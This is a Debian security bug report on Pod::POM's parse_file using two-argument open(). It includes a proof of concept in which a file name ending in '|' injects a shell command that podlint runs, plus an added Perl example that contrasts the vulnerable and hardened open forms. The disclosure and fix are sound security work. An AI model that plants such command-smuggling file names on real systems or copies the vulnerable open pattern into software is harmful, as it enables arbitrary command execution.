Bug#923224: Pod::POM::parse_file() uses 2-argument open()
Jakub Wilk
jwilk at jwilk.net
Mon Feb 25 08:31:49 GMT 2019
Package: libpod-pom-perl
Version: 2.01-2
Tags: security
Control: affects -1 check-all-the-things
The Pod::POM::parse_file function uses 2-argument open(), so a filename is
also parsed as a mode: a name ending in '|' is treated as a command to pipe
from and is run through the shell.
As a consequence, podlint can't be used securely to check files with
untrusted names.
Proof of concept:
$ touch '; cowsay pwned >&2 |'
$ podlint ./*
sh: 1: ./: Permission denied
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Use of uninitialized value $text in pattern match (m//) at /usr/share/perl5/Pod/POM.pm line 193.
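The shape of the bug next to the hardened form, as an added example that is not part of this report or of Pod::POM itself; the helper names read_pod_unsafe/read_pod_safe and the constructed filename are hypothetical:

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Vulnerable shape: two-argument open() lets the *name* pick the mode.
# A name ending in '|' becomes a pipe-open and is run through the shell,
# which is exactly what the podlint run above shows.  Kept here only for
# contrast; this script never calls it.
sub read_pod_unsafe {
    my ($name) = @_;
    open(my $fh, $name) or return;          # 2-arg: mode parsed from $name
    local $/;                               # slurp mode
    return scalar <$fh>;
}

# Hardened shape: three-argument open() with an explicit '<' mode.  The
# name is now purely a path; '|', '<', '>' and surrounding whitespace in it
# carry no special meaning.
sub read_pod_safe {
    my ($name) = @_;
    open(my $fh, '<', $name) or die "cannot open '$name': $!";
    local $/;
    my $text = <$fh>;
    close $fh;
    return $text;
}

# Constructed check: a file whose name would be a pipe-open under 2-arg
# open().  The command in it is harmless; the point is that it never runs.
my $dir  = tempdir(CLEANUP => 1);
my $name = File::Spec->catfile($dir, 'echo should-not-run |');

open(my $out, '>', $name) or die "cannot create '$name': $!";
print {$out} "=head1 NAME\n\nexample - a POD fragment\n";
close $out;

# With 3-arg open() the name is taken literally, so we get the file's own
# text back rather than the output of a shell command.
my $text = read_pod_safe($name);
print "read ", length($text), " bytes from: $name\n";
print $text;
```

Any POD reader that accepts untrusted paths should use the three-argument form (or check for names that start or end with pipe or redirection characters and whitespace before handing them to a library that still uses two-argument open()).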
-- System Information:
Architecture: i386
Versions of packages libpod-pom-perl depends on:
ii perl 5.28.1-4
--
Jakub Wilk